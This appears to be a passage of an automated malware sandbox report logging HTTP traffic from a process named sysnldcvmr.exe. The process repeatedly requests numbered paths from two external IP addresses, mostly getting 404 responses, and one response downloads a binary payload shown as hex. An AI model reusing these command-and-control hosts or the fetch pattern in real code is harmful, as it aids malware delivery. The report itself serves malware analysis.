Dec 5, 2024 17:35:09.837501049 CET	1236	IN	Data Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d Data Ascii: 1a@ #o;R`_\|#\|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz\|d
Dec 5, 2024 17:35:09.837512970 CET	448	IN	Data Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b Data Ascii: a;^;3\|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
Dec 5, 2024 17:35:09.837599993 CET	1236	IN	Data Raw: 41 c1 34 56 f2 55 b0 4d af 8a 80 b7 40 d4 5e 95 8a dc 8c 32 38 f4 a5 cc ca e0 ce c7 ca af 2a 42 df ce 62 d9 09 b8 e9 5f 46 17 6b aa 12 de 7a 63 dc 80 4e 8c 51 45 99 44 37 27 8f d3 1a 49 53 4e f2 b7 35 44 4c 5b e4 79 68 89 33 88 00 a3 df b5 a7 6a Data Ascii: A4VUM@^28Bb_FkzcNQED7'ISN5DL[yh3j}<Ci&`^sM:fmw15=m$>M;8_$*xqY0kw4~KlL)WJ~:n`Ji%}0LZWM$hxw]
Dec 5, 2024 17:35:09.837611914 CET	1236	IN	Data Raw: a8 4d 51 63 eb a7 20 7e d2 fa 29 ba 1b 73 87 fb 92 57 1a 68 37 7a b4 92 d6 a2 34 3e b3 ba 28 e9 b5 6f d3 75 a1 7f ab ce 05 8f e2 c0 b1 aa c1 af 81 e0 c7 72 c7 81 e5 2a 1a 8a 51 d2 3c ea 20 eb 93 03 b2 4d cc 0d b4 39 de 99 4b 3d 32 aa f2 42 ab 9b Data Ascii: MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe4QJ$?@nw${xTuBenf4Ua]}E_TpJu$"&
Dec 5, 2024 17:35:09.837624073 CET	1236	IN	Data Raw: 7c b3 3e 5f 83 de 43 2b be 5d 80 60 a6 86 4f 47 33 1c e5 b6 64 d9 1d ad 65 db 91 96 7b 74 6c 1a 6e 41 6a bf 7d 97 78 41 fc 07 d8 44 7c c8 dc df a3 6b 02 48 8e 39 47 cb 09 12 56 19 ec 5e 7a 6d 54 eb 7b ef c8 d8 b1 79 fc 3b fe 63 e7 7d 77 92 33 70 Data Ascii: \|>_C+]`OG3de{tlnAj}xAD\|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P1~#wRpvTW$Kz{]ok>IXj@U;[h
Dec 5, 2024 17:35:09.837635994 CET	1236	IN	Data Raw: 67 33 81 46 d2 a2 1e da 71 8d 02 f5 24 7b 9b 3a e7 05 54 e2 ce 99 87 94 03 3b f4 1f 3b 68 6b d9 52 1f 66 ae b8 18 bc 00 6a d6 46 37 c9 61 fd 94 ba 43 e5 3b ee 40 fb 35 38 a6 dc 48 a9 74 7d 75 c7 86 f5 b7 6f 73 e8 b1 fa 28 92 95 a5 68 91 da 2f 52 Data Ascii: g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$ZvN?\|vV%;kat{<h}aX.gcw)!Dc/&nY8}
Dec 5, 2024 17:35:09.837770939 CET	1236	IN	Data Raw: 19 99 16 2c 13 e8 15 b6 89 20 89 bb ea b9 0f 0a f3 0a d1 08 32 f2 9b 53 61 55 44 51 bb 27 5a 5e 43 85 e0 98 fc c0 9e 44 eb bf 4d 8a 60 c3 69 52 fb d4 0c e1 da 53 a5 a4 95 56 4b 73 89 9c 6b 68 40 74 c8 fd 28 54 21 a1 a5 ba 13 c0 e5 2b 78 b5 0f 09 Data Ascii: , 2SaUDQ'Z^CDM`iRSVKskh@t(T!+xR<!e_{);$24S8qwj^rPKC68LzmM>.S}SN},@83607DBUIUhi3v+DQ?t5_}NgCb;Ql-
Dec 5, 2024 17:35:09.837784052 CET	1236	IN	Data Raw: fe 7d ce 40 84 c1 d8 2d fe 58 17 46 b0 39 5b e1 b0 9c f8 40 c3 ed d5 47 75 fc e6 6b 4b e1 87 75 f7 b4 57 f6 2a f4 ef 1b f7 4e 76 10 81 94 70 fb d3 ec 1b 0f 49 69 8c 41 c2 5c 41 3e 68 46 4c 75 76 d0 eb a0 db 10 59 ea 85 3f 0c 39 f5 3f 34 67 17 fa Data Ascii: }@-XF9[@GukKuWNvpIiA\A>hFLuvY?9?4gcoJ{eN-Z'DIG)X/]@Q*6yO11y4I#La!5Pqej3ZH2uDTs%1w/5Zaq:_k}H
Dec 5, 2024 17:35:09.837795973 CET	544	IN	Data Raw: c5 ab 52 ae 6f 54 0f 16 79 88 5b 95 20 c3 33 b3 1b 6f 3d da da 80 4b 78 aa 4d e0 77 c2 2e 47 a2 76 05 07 70 d7 26 db f4 8b b6 ab 10 a3 b3 51 bf be 1a e2 fa 9f 95 8b 52 d4 d6 be 8a ab 2e 28 58 a0 9a bf 0f 59 49 6c 8a e1 61 c0 ca 9b 19 d4 22 09 a3 Data Ascii: RoTy[ 3o=KxMw.Gvp&QR.(XYIla"@\|%]~q_io^P~A:ug3G_3NYNTv:lF.PYlN;>&g`;tfQsb7EYE@}b2&wMp5L!'
Dec 5, 2024 17:35:09.957513094 CET	1236	IN	Data Raw: c2 69 40 80 88 4d 14 5f 39 28 34 05 23 5c 27 65 96 01 7f 2d 19 3b e9 76 3a 15 37 dd 67 dd d2 0e d4 60 2c ac f1 2a f5 e0 ff d7 86 7c fd 0c 06 46 2d d1 5f c5 f4 01 2e 07 45 32 18 fe 5a 1e b0 04 3a fc de c3 17 8d 3a 9d c8 50 40 df d5 83 65 27 15 9a Data Ascii: i@M_9(4#\'e-;v:7g`,\|F-_.E2Z::P@e' YCl?w}9-K}Y}B(xOg"+~YefZNO<Z{[YB??fHC:E-{9KjYKNO/Bb7=_!AWaIa!.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.11	50068	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:12.125674963 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:13.491399050 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:13 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.11	50070	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:16.852364063 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:35:18.167362928 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:17 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.11	50071	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:20.454067945 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:35:21.797003984 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:21 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.11	50073	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:24.079926014 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:35:25.411205053 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:25 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.11	50075	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:27.731091022 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:35:29.060957909 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:28 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.11	50077	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:31.421667099 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:35:32.739923000 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:32 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.11	50078	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:36.488997936 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:37.820250034 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:37 GMT Content-Type: application/octet-stream Content-Length: 9472 Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT Connection: keep-alive ETag: "674f01b0-2500" Accept-Ranges: bytes Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED] Data Ascii: Eqn7n%v u&PUK:PXwj>?hr"BH+<_i@Ft(sIe0al.BM_$"o665&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b\|HyW9>Sgx%2S\4`zG
Dec 5, 2024 17:35:37.820276022 CET	1236	IN	Data Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81 Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw\|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[
Dec 5, 2024 17:35:37.820290089 CET	1236	IN	Data Raw: 89 11 90 f0 30 5d 06 79 7d 11 91 53 a2 46 2a 99 af 89 be 89 c8 83 47 2f 5e ef 6a 87 f1 7c 3a df a2 02 bb a3 df d2 1f 3a 08 9d e6 63 5d dd e3 c8 b4 1a ad 2a 53 c5 97 64 d5 9b b7 66 cc 4b 9e c7 1a 33 07 e8 ac 25 da a7 84 91 1d 25 bd de 9a e6 f7 1a Data Ascii: 0]y}SFG/^j\|::c]SdfK3%%4vriY^~4w/'`3Wx0b/".4AM0IjS#O'1V##+.jttssp4F9a0{W{+mF9_X#9`<`811
Dec 5, 2024 17:35:37.820302010 CET	1236	IN	Data Raw: 1d be e3 38 fe 87 7e b5 6d 58 aa 5c 13 e6 a5 b7 77 a5 c8 43 39 e2 87 3a 9a d6 88 bd c1 a8 f5 24 83 23 a6 89 0d de 27 33 d7 55 67 b0 a9 0e 84 95 1d 85 2c 1d e0 b5 27 93 cb 6e db b1 78 8b c2 05 c1 16 93 b6 0f 53 d9 20 e5 88 aa c2 25 c4 f3 16 d3 1d Data Ascii: 8~mX\wC9:$#'3Ug,'nxS %kU0]P>/DO\)#B+w~GkumhhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\ep
Dec 5, 2024 17:35:37.820316076 CET	1236	IN	Data Raw: 2f d2 b0 3f e0 39 9a 07 57 31 bc fd 0e 71 99 76 58 86 49 b0 90 52 15 84 2c 37 30 4e 73 a1 ca 93 3d 29 c7 b9 aa 3f 97 61 0f a3 a5 e1 dc 06 ec 8d 7f 52 6d 54 b5 79 ff eb 4b 04 ec 05 bd cd 2c 34 02 21 8b 77 e6 70 c0 d6 2f be 36 de 14 26 aa db 2a b7 Data Ascii: /?9W1qvXIR,70Ns=)?aRmTyK,4!wp/6&*_C2kYO~6~hcah\(W"hY$4C$fjz0nqh:~rfrN1Vx1qn>5T M .A'=+<
Dec 5, 2024 17:35:37.820327997 CET	1236	IN	Data Raw: f5 33 7e 51 d0 1d 0a cc 3f c9 2e 84 8f 1f 47 7d e2 6d e2 1a 0f f8 27 13 14 59 b3 46 45 33 ef f4 67 df eb e0 59 ff 29 b1 ea 12 c8 d9 b4 d1 af e6 9a fb a4 ba 80 a7 30 c6 d1 c0 f6 10 d3 09 45 64 60 be e2 7c cb 6d ea 76 2f 1b 4e e8 b1 98 dc 7f 2e b1 Data Ascii: 3~Q?.G}m'YFE3gY)0Ed`\|mv/N.bT3>r_qaE~=1u,Ok['HJyp[+"22?!s8:8Lb\|BQEdqN96>7:WtKtrXl2CDFcu~ZZqrD-#l}E&Q
